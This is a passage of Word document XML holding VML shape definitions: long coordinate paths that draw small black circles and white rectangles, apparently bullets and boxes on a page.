        <v:shape style="position:absolute;left:1790;top:9230;width:110;height:110" coordorigin="1790,9230" coordsize="110,110" path="m1900,9299l1900,9299,1900,9299,1900,9300,1900,9301,1900,9302,1900,9302,1900,9303,1900,9304,1900,9305,1900,9305,1900,9306,1900,9307,1899,9307,1899,9308,1899,9309,1899,9309,1899,9310,1899,9311,1899,9311,1899,9312,1899,9313,1899,9313,1898,9314,1898,9314,1898,9315,1898,9316,1898,9316,1898,9317,1897,9317,1897,9318,1897,9319,1897,9319,1897,9320,1896,9320,1896,9321,1896,9321,1896,9322,1896,9322,1895,9323,1895,9323,1895,9324,1895,9324,1894,9325,1894,9325,1894,9326,1894,9326,1893,9327,1893,9327,1893,9328,1892,9328,1892,9329,1892,9329,1891,9329,1891,9330,1891,9330,1890,9331,1890,9331,1890,9331,1889,9332,1889,9332,1889,9333,1888,9333,1888,9333,1887,9334,1887,9334,1887,9334,1886,9335,1886,9335,1885,9335,1885,9336,1884,9336,1884,9336,1883,9337,1883,9337,1883,9337,1882,9338,1882,9338,1881,9338,1881,9338,1880,9339,1880,9339,1879,9339,1879,9339,1878,9340,1878,9340,1877,9340,1876,9340,1876,9340,1875,9341,1875,9341,1874,9341,1874,9341,1873,9341,1872,9342,1872,9342,1871,9342,1871,9342,1870,9342,1869,9342,1869,9342,1868,9343,1868,9343,1867,9343,1866,9343,1866,9343,1865,9343,1864,9343,1864,9343,1863,9343,1862,9343,1861,9343,1861,9344,1860,9344,1859,9344,1859,9344,1858,9344,1857,9344,1856,9344,1856,9344,1855,9344,1855,9344,1854,9344,1853,9344,1853,9344,1852,9344,1851,9344,1851,9344,1850,9344,1849,9344,1848,9343,1848,9343,1847,9343,1846,9343,1846,9343,1845,9343,1844,9343,1844,9343,1843,9343,1842,9343,1842,9343,1841,9342,1840,9342,1840,9342,1839,9342,1839,9342,1838,9342,1837,9342,1837,9341,1836,9341,1836,9341,1835,9341,1835,9341,1834,9340,1833,9340,1833,9340,1832,9340,1832,9340,1831,9339,1831,9339,1830,9339,1830,9339,1829,9338,1829,9338,1828,9338,1828,9338,1827,9337,1827,9337,1826,9337,1826,9336,1825,9336,1825,9336,1825,9335,1824,9335,1824,9335,1823,9334,1823,9334,1823,9334,1822,9333,1822,9333,1821,9333,1821,9332,1821,9332,1820,9331,1820,9331,1820,9331,1819,9330,1819,9330,1819,9329,1818,9329,1818,9329,1818,9328,1817,9328,1817,9327,1817,9327,1816,9326,1816,9326,1816,9325,1816,9325,1815,9324,1815,9324,1815,9323,1815,9323,1814,9322,1814,9322,1814,9321,1814,9321,1813,9320,1813,9320,1813,9319,1813,9319,1813,9318,1812,9317,1812,9317,1812,9316,1812,9316,1812,9315,1812,9314,1811,9314,1811,9313,1811,9313,1811,9312,1811,9311,1811,9311,1811,9310,1811,9309,1811,9309,1810,9308,1810,9307,1810,9307,1810,9306,1810,9305,1810,9305,1810,9304,1810,9303,1810,9302,1810,9302,1810,9301,1810,9300,1810,9299,1810,9299,1810,9299,1810,9298,1810,9297,1810,9296,1810,9296,1810,9295,1810,9294,1810,9294,1810,9293,1810,9292,1810,9291,1810,9291,1810,9290,1810,9289,1811,9289,1811,9288,1811,9287,1811,9287,1811,9286,1811,9285,1811,9285,1811,9284,1811,9284,1812,9283,1812,9282,1812,9282,1812,9281,1812,9281,1812,9280,1813,9279,1813,9279,1813,9278,1813,9278,1813,9277,1814,9277,1814,9276,1814,9276,1814,9275,1815,9275,1815,9274,1815,9274,1815,9273,1816,9273,1816,9272,1816,9272,1816,9271,1817,9271,1817,9270,1817,9270,1818,9269,1818,9269,1818,9268,1819,9268,1819,9268,1819,9267,1820,9267,1820,9266,1820,9266,1821,9265,1821,9265,1821,9265,1822,9264,1822,9264,1823,9264,1823,9263,1823,9263,1824,9263,1824,9262,1825,9262,1825,9262,1825,9261,1826,9261,1826,9261,1827,9260,1827,9260,1828,9260,1828,9260,1829,9259,1829,9259,1830,9259,1830,9258,1831,9258,1831,9258,1832,9258,1832,9258,1833,9257,1833,9257,1834,9257,1835,9257,1835,9257,1836,9256,1836,9256,1837,9256,1837,9256,1838,9256,1839,9255,1839,9255,1840,9255,1840,9255,1841,9255,1842,9255,1842,9255,1843,9255,1844,9254,1844,9254,1845,9254,1846,9254,1846,9254,1847,9254,1848,9254,1848,9254,1849,9254,1850,9254,1851,9254,1851,9254,1852,9254,1853,9254,1853,9254,1854,9254,1855,9254,1855,9254,1856,9254,1856,9254,1857,9254,1858,9254,1859,9254,1859,9254,1860,9254,1861,9254,1861,9254,1862,9254,1863,9254,1864,9254,1864,9254,1865,9254,1866,9254,1866,9254,1867,9255,1868,9255,1868,9255,1869,9255,1869,9255,1870,9255,1871,9255,1871,9255,1872,9256,1872,9256,1873,9256,1874,9256,1874,9256,1875,9257,1875,9257,1876,9257,1876,9257,1877,9257,1878,9258,1878,9258,1879,9258,1879,9258,1880,9258,1880,9259,1881,9259,1881,9259,1882,9260,1882,9260,1883,9260,1883,9260,1883,9261,1884,9261,1884,9261,1885,9262,1885,9262,1886,9262,1886,9263,1887,9263,1887,9263,1887,9264,1888,9264,1888,9264,1889,9265,1889,9265,1889,9265,1890,9266,1890,9266,1890,9267,1891,9267,1891,9268,1891,9268,1892,9268,1892,9269,1892,9269,1893,9270,1893,9270,1893,9271,1894,9271,1894,9272,1894,9272,1894,9273,1895,9273,1895,9274,1895,9274,1895,9275,1896,9275,1896,9276,1896,9276,1896,9277,1896,9277,1897,9278,1897,9278,1897,9279,1897,9279,1897,9280,1898,9281,1898,9281,1898,9282,1898,9282,1898,9283,1898,9284,1899,9284,1899,9285,1899,9285,1899,9286,1899,9287,1899,9287,1899,9288,1899,9289,1899,9289,1899,9290,1900,9291,1900,9291,1900,9292,1900,9293,1900,9294,1900,9294,1900,9295,1900,9296,1900,9296,1900,9297,1900,9298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,1900,9299e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:482.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,9650" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:9650;width:110;height:110" coordorigin="1790,9650" coordsize="110,110" path="m1900,9719l1900,9719,1900,9720,1900,9720,1900,9721,1900,9722,1900,9723,1900,9723,1900,9724,1900,9725,1900,9725,1900,9726,1900,9727,1899,9728,1899,9728,1899,9729,1899,9730,1899,9730,1899,9731,1899,9731,1899,9732,1899,9733,1899,9733,1898,9734,1898,9735,1898,9735,1898,9736,1898,9736,1898,9737,1897,9738,1897,9738,1897,9739,1897,9739,1897,9740,1896,9740,1896,9741,1896,9741,1896,9742,1896,9743,1895,9743,1895,9744,1895,9744,1895,9745,1894,9745,1894,9746,1894,9746,1894,9747,1893,9747,1893,9747,1893,9748,1892,9748,1892,9749,1892,9749,1891,9750,1891,9750,1891,9750,1890,9751,1890,9751,1890,9752,1889,9752,1889,9752,1889,9753,1888,9753,1888,9754,1887,9754,1887,9754,1887,9755,1886,9755,1886,9755,1885,9756,1885,9756,1884,9756,1884,9757,1883,9757,1883,9757,1883,9757,1882,9758,1882,9758,1881,9758,1881,9759,1880,9759,1880,9759,1879,9759,1879,9760,1878,9760,1878,9760,1877,9760,1876,9760,1876,9761,1875,9761,1875,9761,1874,9761,1874,9761,1873,9762,1872,9762,1872,9762,1871,9762,1871,9762,1870,9762,1869,9763,1869,9763,1868,9763,1868,9763,1867,9763,1866,9763,1866,9763,1865,9763,1864,9763,1864,9763,1863,9764,1862,9764,1861,9764,1861,9764,1860,9764,1859,9764,1859,9764,1858,9764,1857,9764,1856,9764,1856,9764,1855,9764,1855,9764,1854,9764,1853,9764,1853,9764,1852,9764,1851,9764,1851,9764,1850,9764,1849,9764,1848,9764,1848,9764,1847,9764,1846,9763,1846,9763,1845,9763,1844,9763,1844,9763,1843,9763,1842,9763,1842,9763,1841,9763,1840,9763,1840,9762,1839,9762,1839,9762,1838,9762,1837,9762,1837,9762,1836,9761,1836,9761,1835,9761,1835,9761,1834,9761,1833,9760,1833,9760,1832,9760,1832,9760,1831,9760,1831,9759,1830,9759,1830,9759,1829,9759,1829,9758,1828,9758,1828,9758,1827,9757,1827,9757,1826,9757,1826,9757,1825,9756,1825,9756,1825,9756,1824,9755,1824,9755,1823,9755,1823,9754,1823,9754,1822,9754,1822,9753,1821,9753,1821,9752,1821,9752,1820,9752,1820,9751,1820,9751,1819,9750,1819,9750,1819,9750,1818,9749,1818,9749,1818,9748,1817,9748,1817,9747,1817,9747,1816,9747,1816,9746,1816,9746,1816,9745,1815,9745,1815,9744,1815,9744,1815,9743,1814,9743,1814,9742,1814,9741,1814,9741,1813,9740,1813,9740,1813,9739,1813,9739,1813,9738,1812,9738,1812,9737,1812,9736,1812,9736,1812,9735,1812,9735,1811,9734,1811,9733,1811,9733,1811,9732,1811,9731,1811,9731,1811,9730,1811,9730,1811,9729,1810,9728,1810,9728,1810,9727,1810,9726,1810,9725,1810,9725,1810,9724,1810,9723,1810,9723,1810,9722,1810,9721,1810,9720,1810,9720,1810,9719,1810,9719,1810,9718,1810,9717,1810,9717,1810,9716,1810,9715,1810,9714,1810,9714,1810,9713,1810,9712,1810,9712,1810,9711,1810,9710,1810,9710,1811,9709,1811,9708,1811,9708,1811,9707,1811,9706,1811,9706,1811,9705,1811,9704,1811,9704,1812,9703,1812,9703,1812,9702,1812,9701,1812,9701,1812,9700,1813,9700,1813,9699,1813,9698,1813,9698,1813,9697,1814,9697,1814,9696,1814,9696,1814,9695,1815,9695,1815,9694,1815,9694,1815,9693,1816,9693,1816,9692,1816,9692,1816,9691,1817,9691,1817,9690,1817,9690,1818,9689,1818,9689,1818,9689,1819,9688,1819,9688,1819,9687,1820,9687,1820,9686,1820,9686,1821,9686,1821,9685,1821,9685,1822,9685,1822,9684,1823,9684,1823,9683,1823,9683,1824,9683,1824,9682,1825,9682,1825,9682,1825,9682,1826,9681,1826,9681,1827,9681,1827,9680,1828,9680,1828,9680,1829,9679,1829,9679,1830,9679,1830,9679,1831,9678,1831,9678,1832,9678,1832,9678,1833,9678,1833,9677,1834,9677,1835,9677,1835,9677,1836,9677,1836,9676,1837,9676,1837,9676,1838,9676,1839,9676,1839,9676,1840,9675,1840,9675,1841,9675,1842,9675,1842,9675,1843,9675,1844,9675,1844,9675,1845,9674,1846,9674,1846,9674,1847,9674,1848,9674,1848,9674,1849,9674,1850,9674,1851,9674,1851,9674,1852,9674,1853,9674,1853,9674,1854,9674,1855,9674,1855,9674,1856,9674,1856,9674,1857,9674,1858,9674,1859,9674,1859,9674,1860,9674,1861,9674,1861,9674,1862,9674,1863,9674,1864,9674,1864,9674,1865,9674,1866,9675,1866,9675,1867,9675,1868,9675,1868,9675,1869,9675,1869,9675,1870,9675,1871,9676,1871,9676,1872,9676,1872,9676,1873,9676,1874,9676,1874,9677,1875,9677,1875,9677,1876,9677,1876,9677,1877,9678,1878,9678,1878,9678,1879,9678,1879,9678,1880,9679,1880,9679,1881,9679,1881,9679,1882,9680,1882,9680,1883,9680,1883,9681,1883,9681,1884,9681,1884,9682,1885,9682,1885,9682,1886,9682,1886,9683,1887,9683,1887,9683,1887,9684,1888,9684,1888,9685,1889,9685,1889,9685,1889,9686,1890,9686,1890,9686,1890,9687,1891,9687,1891,9688,1891,9688,1892,9689,1892,9689,1892,9689,1893,9690,1893,9690,1893,9691,1894,9691,1894,9692,1894,9692,1894,9693,1895,9693,1895,9694,1895,9694,1895,9695,1896,9695,1896,9696,1896,9696,1896,9697,1896,9697,1897,9698,1897,9698,1897,9699,1897,9700,1897,9700,1898,9701,1898,9701,1898,9702,1898,9703,1898,9703,1898,9704,1899,9704,1899,9705,1899,9706,1899,9706,1899,9707,1899,9708,1899,9708,1899,9709,1899,9710,1899,9710,1900,9711,1900,9712,1900,9712,1900,9713,1900,9714,1900,9714,1900,9715,1900,9716,1900,9717,1900,9717,1900,9718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,1900,9719e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:11870;width:130;height:250" coordorigin="4710,11870" coordsize="130,250" path="m4736,11880l4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4738,11880,4738,11880,4738,11880,4738,11880,4738,11880,4739,11880,4739,11880,4739,11880,4739,11880,4739,11880,4740,11880,4740,11880,4740,11880,4741,11880,4741,11880,4741,11880,4742,11880,4742,11880,4742,11880,4743,11880,4743,11880,4744,11880,4744,11880,4745,11880,4745,11880,4746,11880,4746,11880,4747,11880,4748,11880,4748,11880,4749,11880,4750,11880,4750,11880,4751,11880,4752,11880,4753,11880,4753,11880,4754,11880,4755,11880,4756,11880,4757,11880,4758,11880,4759,11880,4760,11880,4761,11880,4762,11880,4763,11880,4764,11880,4765,11880,4766,11880,4768,11880,4769,11880,4770,11880,4772,11880,4773,11880,4774,11880,4776,11880,4777,11880,4779,11880,4780,11880,4782,11880,4783,11880,4785,11880,4787,11880,4788,11880,4790,11880,4792,11880,4794,11880,4796,11880,4797,11880,4799,11880,4801,11880,4803,11880,4806,11880,4808,11880,4810,11880,4812,11880,4814,11880,4817,11880,4819,11880,4821,11880,4824,11880,4826,11880,4829,11880,4831,11880,4834,11880,4836,11880,4839,11880,4842,11880,4845,11880,4848,11880,4850,11880,4853,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11881,4856,11881,4856,11881,4856,11881,4856,11881,4856,11881,4856,11882,4856,11882,4856,11882,4856,11882,4856,11883,4856,11883,4856,11883,4856,11884,4856,11884,4856,11884,4856,11885,4856,11885,4856,11886,4856,11886,4856,11887,4856,11888,4856,11888,4856,11889,4856,11890,4856,11890,4856,11891,4856,11892,4856,11893,4856,11894,4856,11895,4856,11896,4856,11897,4856,11898,4856,11899,4856,11900,4856,11901,4856,11903,4856,11904,4856,11905,4856,11907,4856,11908,4856,11910,4856,11911,4856,11913,4856,11914,4856,11916,4856,11918,4856,11920,4856,11922,4856,11924,4856,11926,4856,11928,4856,11930,4856,11932,4856,11934,4856,11936,4856,11939,4856,11941,4856,11944,4856,11946,4856,11949,4856,11952,4856,11955,4856,11958,4856,11960,4856,11963,4856,11967,4856,11970,4856,11973,4856,11976,4856,11980,4856,11983,4856,11987,4856,11990,4856,11994,4856,11998,4856,12002,4856,12006,4856,12010,4856,12014,4856,12018,4856,12022,4856,12027,4856,12031,4856,12036,4856,12041,4856,12045,4856,12050,4856,12055,4856,12060,4856,12065,4856,12071,4856,12076,4856,12081,4856,12087,4856,12093,4856,12098,4856,12104,4856,12110,4856,12116,4856,12122,4856,12129,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4854,12135,4854,12135,4854,12135,4854,12135,4853,12135,4853,12135,4853,12135,4853,12135,4852,12135,4852,12135,4852,12135,4851,12135,4851,12135,4850,12135,4850,12135,4850,12135,4849,12135,4849,12135,4848,12135,4848,12135,4847,12135,4846,12135,4846,12135,4845,12135,4845,12135,4844,12135,4843,12135,4843,12135,4842,12135,4841,12135,4840,12135,4839,12135,4839,12135,4838,12135,4837,12135,4836,12135,4835,12135,4834,12135,4833,12135,4832,12135,4831,12135,4830,12135,4829,12135,4828,12135,4826,12135,4825,12135,4824,12135,4823,12135,4821,12135,4820,12135,4819,12135,4817,12135,4816,12135,4814,12135,4813,12135,4811,12135,4810,12135,4808,12135,4806,12135,4805,12135,4803,12135,4801,12135,4799,12135,4797,12135,4795,12135,4793,12135,4791,12135,4789,12135,4787,12135,4785,12135,4783,12135,4781,12135,4779,12135,4776,12135,4774,12135,4772,12135,4769,12135,4767,12135,4764,12135,4762,12135,4759,12135,4756,12135,4754,12135,4751,12135,4748,12135,4745,12135,4742,12135,4739,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12133,4736,12133,4736,12133,4736,12132,4736,12132,4736,12132,4736,12131,4736,12131,4736,12131,4736,12130,4736,12130,4736,12129,4736,12129,4736,12128,4736,12127,4736,12127,4736,12126,4736,12125,4736,12125,4736,12124,4736,12123,4736,12122,4736,12121,4736,12120,4736,12119,4736,12118,4736,12117,4736,12116,4736,12115,4736,12114,4736,12113,4736,12111,4736,12110,4736,12109,4736,12107,4736,12106,4736,12104,4736,12102,4736,12101,4736,12099,4736,12097,4736,12095,4736,12094,4736,12092,4736,12090,4736,12088,4736,12085,4736,12083,4736,12081,4736,12079,4736,12076,4736,12074,4736,12071,4736,12069,4736,12066,4736,12063,4736,12060,4736,12058,4736,12055,4736,12052,4736,12049,4736,12045,4736,12042,4736,12039,4736,12035,4736,12032,4736,12028,4736,12025,4736,12021,4736,12017,4736,12013,4736,12009,4736,12005,4736,12001,4736,11997,4736,11993,4736,11988,4736,11984,4736,11979,4736,11974,4736,11970,4736,11965,4736,11960,4736,11955,4736,11950,4736,11944,4736,11939,4736,11934,4736,11928,4736,11922,4736,11917,4736,11911,4736,11905,4736,11899,4736,11893,4736,11886,4736,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:11870;width:130;height:250" coordorigin="6390,11870" coordsize="130,250" path="m6417,11880l6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6419,11880,6419,11880,6419,11880,6419,11880,6419,11880,6420,11880,6420,11880,6420,11880,6420,11880,6421,11880,6421,11880,6421,11880,6421,11880,6422,11880,6422,11880,6423,11880,6423,11880,6423,11880,6424,11880,6424,11880,6425,11880,6425,11880,6426,11880,6426,11880,6427,11880,6427,11880,6428,11880,6428,11880,6429,11880,6430,11880,6430,11880,6431,11880,6432,11880,6433,11880,6433,11880,6434,11880,6435,11880,6436,11880,6437,11880,6438,11880,6439,11880,6440,11880,6441,11880,6442,11880,6443,11880,6444,11880,6445,11880,6446,11880,6447,11880,6449,11880,6450,11880,6451,11880,6452,11880,6454,11880,6455,11880,6457,11880,6458,11880,6459,11880,6461,11880,6463,11880,6464,11880,6466,11880,6467,11880,6469,11880,6471,11880,6473,11880,6475,11880,6476,11880,6478,11880,6480,11880,6482,11880,6484,11880,6486,11880,6488,11880,6491,11880,6493,11880,6495,11880,6497,11880,6500,11880,6502,11880,6505,11880,6507,11880,6509,11880,6512,11880,6515,11880,6517,11880,6520,11880,6523,11880,6526,11880,6528,11880,6531,11880,6534,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11881,6537,11881,6537,11881,6537,11881,6537,11881,6537,11881,6537,11882,6537,11882,6537,11882,6537,11882,6537,11883,6537,11883,6537,11883,6537,11884,6537,11884,6537,11884,6537,11885,6537,11885,6537,11886,6537,11886,6537,11887,6537,11888,6537,11888,6537,11889,6537,11890,6537,11890,6537,11891,6537,11892,6537,11893,6537,11894,6537,11895,6537,11896,6537,11897,6537,11898,6537,11899,6537,11900,6537,11901,6537,11903,6537,11904,6537,11905,6537,11907,6537,11908,6537,11910,6537,11911,6537,11913,6537,11914,6537,11916,6537,11918,6537,11920,6537,11922,6537,11924,6537,11926,6537,11928,6537,11930,6537,11932,6537,11934,6537,11936,6537,11939,6537,11941,6537,11944,6537,11946,6537,11949,6537,11952,6537,11955,6537,11958,6537,11960,6537,11963,6537,11967,6537,11970,6537,11973,6537,11976,6537,11980,6537,11983,6537,11987,6537,11990,6537,11994,6537,11998,6537,12002,6537,12006,6537,12010,6537,12014,6537,12018,6537,12022,6537,12027,6537,12031,6537,12036,6537,12041,6537,12045,6537,12050,6537,12055,6537,12060,6537,12065,6537,12071,6537,12076,6537,12081,6537,12087,6537,12093,6537,12098,6537,12104,6537,12110,6537,12116,6537,12122,6537,12129,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6535,12135,6535,12135,6535,12135,6535,12135,6534,12135,6534,12135,6534,12135,6534,12135,6533,12135,6533,12135,6533,12135,6532,12135,6532,12135,6532,12135,6531,12135,6531,12135,6530,12135,6530,12135,6529,12135,6529,12135,6528,12135,6528,12135,6527,12135,6527,12135,6526,12135,6525,12135,6525,12135,6524,12135,6523,12135,6523,12135,6522,12135,6521,12135,6520,12135,6519,12135,6519,12135,6518,12135,6517,12135,6516,12135,6515,12135,6514,12135,6513,12135,6512,12135,6511,12135,6510,12135,6508,12135,6507,12135,6506,12135,6505,12135,6503,12135,6502,12135,6501,12135,6499,12135,6498,12135,6497,12135,6495,12135,6494,12135,6492,12135,6490,12135,6489,12135,6487,12135,6485,12135,6484,12135,6482,12135,6480,12135,6478,12135,6476,12135,6474,12135,6472,12135,6470,12135,6468,12135,6466,12135,6464,12135,6462,12135,6459,12135,6457,12135,6455,12135,6452,12135,6450,12135,6448,12135,6445,12135,6442,12135,6440,12135,6437,12135,6434,12135,6432,12135,6429,12135,6426,12135,6423,12135,6420,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12133,6417,12133,6417,12133,6417,12132,6417,12132,6417,12132,6417,12131,6417,12131,6417,12131,6417,12130,6417,12130,6417,12129,6417,12129,6417,12128,6417,12127,6417,12127,6417,12126,6417,12125,6417,12125,6417,12124,6417,12123,6417,12122,6417,12121,6417,12120,6417,12119,6417,12118,6417,12117,6417,12116,6417,12115,6417,12114,6417,12113,6417,12111,6417,12110,6417,12109,6417,12107,6417,12106,6417,12104,6417,12102,6417,12101,6417,12099,6417,12097,6417,12095,6417,12094,6417,12092,6417,12090,6417,12088,6417,12085,6417,12083,6417,12081,6417,12079,6417,12076,6417,12074,6417,12071,6417,12069,6417,12066,6417,12063,6417,12060,6417,12058,6417,12055,6417,12052,6417,12049,6417,12045,6417,12042,6417,12039,6417,12035,6417,12032,6417,12028,6417,12025,6417,12021,6417,12017,6417,12013,6417,12009,6417,12005,6417,12001,6417,11997,6417,11993,6417,11988,6417,11984,6417,11979,6417,11974,6417,11970,6417,11965,6417,11960,6417,11955,6417,11950,6417,11944,6417,11939,6417,11934,6417,11928,6417,11922,6417,11917,6417,11911,6417,11905,6417,11899,6417,11893,6417,11886,6417,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:606.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,12130" coordsize="130,270">
        <v:shape style="position:absolute;left:3510;top:12130;width:130;height:270" coordorigin="3510,12130" coordsize="130,270" path="m3521,12150l3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3523,12150,3523,12150,3523,12150,3523,12150,3523,12150,3524,12150,3524,12150,3524,12150,3524,12150,3525,12150,3525,12150,3525,12150,3526,12150,3526,12150,3526,12150,3527,12150,3527,12150,3528,12150,3528,12150,3529,12150,3529,12150,3530,12150,3530,12150,3531,12150,3531,12150,3532,12150,3533,12150,3533,12150,3534,12150,3535,12150,3535,12150,3536,12150,3537,12150,3538,12150,3539,12150,3539,12150,3540,12150,3541,12150,3542,12150,3543,12150,3544,12150,3545,12150,3546,12150,3547,12150,3548,12150,3550,12150,3551,12150,3552,12150,3553,12150,3555,12150,3556,12150,3557,12150,3559,12150,3560,12150,3562,12150,3563,12150,3565,12150,3566,12150,3568,12150,3569,12150,3571,12150,3573,12150,3574,12150,3576,12150,3578,12150,3580,12150,3582,12150,3584,12150,3586,12150,3588,12150,3590,12150,3592,12150,3594,12150,3596,12150,3599,12150,3601,12150,3603,12150,3606,12150,3608,12150,3611,12150,3613,12150,3616,12150,3618,12150,3621,12150,3624,12150,3626,12150,3629,12150,3632,12150,3635,12150,3638,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12152,3641,12152,3641,12152,3641,12152,3641,12152,3641,12153,3641,12153,3641,12153,3641,12154,3641,12154,3641,12155,3641,12155,3641,12156,3641,12156,3641,12157,3641,12157,3641,12158,3641,12158,3641,12159,3641,12160,3641,12161,3641,12161,3641,12162,3641,12163,3641,12164,3641,12165,3641,12166,3641,12167,3641,12168,3641,12169,3641,12170,3641,12171,3641,12173,3641,12174,3641,12175,3641,12177,3641,12178,3641,12180,3641,12181,3641,12183,3641,12184,3641,12186,3641,12188,3641,12190,3641,12192,3641,12194,3641,12196,3641,12198,3641,12200,3641,12202,3641,12204,3641,12207,3641,12209,3641,12211,3641,12214,3641,12217,3641,12219,3641,12222,3641,12225,3641,12228,3641,12231,3641,12234,3641,12237,3641,12240,3641,12243,3641,12246,3641,12250,3641,12253,3641,12257,3641,12260,3641,12264,3641,12268,3641,12272,3641,12276,3641,12280,3641,12284,3641,12288,3641,12293,3641,12297,3641,12302,3641,12306,3641,12311,3641,12316,3641,12320,3641,12325,3641,12330,3641,12336,3641,12341,3641,12346,3641,12352,3641,12357,3641,12363,3641,12369,3641,12374,3641,12380,3641,12386,3641,12393,3641,12399,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3639,12405,3639,12405,3639,12405,3639,12405,3639,12405,3638,12405,3638,12405,3638,12405,3638,12405,3638,12405,3637,12405,3637,12405,3637,12405,3636,12405,3636,12405,3636,12405,3635,12405,3635,12405,3634,12405,3634,12405,3633,12405,3633,12405,3632,12405,3632,12405,3631,12405,3631,12405,3630,12405,3630,12405,3629,12405,3628,12405,3628,12405,3627,12405,3626,12405,3625,12405,3625,12405,3624,12405,3623,12405,3622,12405,3621,12405,3620,12405,3619,12405,3618,12405,3617,12405,3616,12405,3615,12405,3614,12405,3613,12405,3612,12405,3611,12405,3610,12405,3608,12405,3607,12405,3606,12405,3604,12405,3603,12405,3602,12405,3600,12405,3599,12405,3597,12405,3596,12405,3594,12405,3592,12405,3591,12405,3589,12405,3587,12405,3585,12405,3584,12405,3582,12405,3580,12405,3578,12405,3576,12405,3574,12405,3572,12405,3570,12405,3567,12405,3565,12405,3563,12405,3561,12405,3558,12405,3556,12405,3554,12405,3551,12405,3549,12405,3546,12405,3543,12405,3541,12405,3538,12405,3535,12405,3532,12405,3530,12405,3527,12405,3524,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12404,3521,12404,3521,12404,3521,12404,3521,12404,3521,12403,3521,12403,3521,12403,3521,12403,3521,12402,3521,12402,3521,12402,3521,12401,3521,12401,3521,12400,3521,12400,3521,12399,3521,12399,3521,12398,3521,12398,3521,12397,3521,12396,3521,12396,3521,12395,3521,12394,3521,12393,3521,12392,3521,12391,3521,12391,3521,12390,3521,12389,3521,12387,3521,12386,3521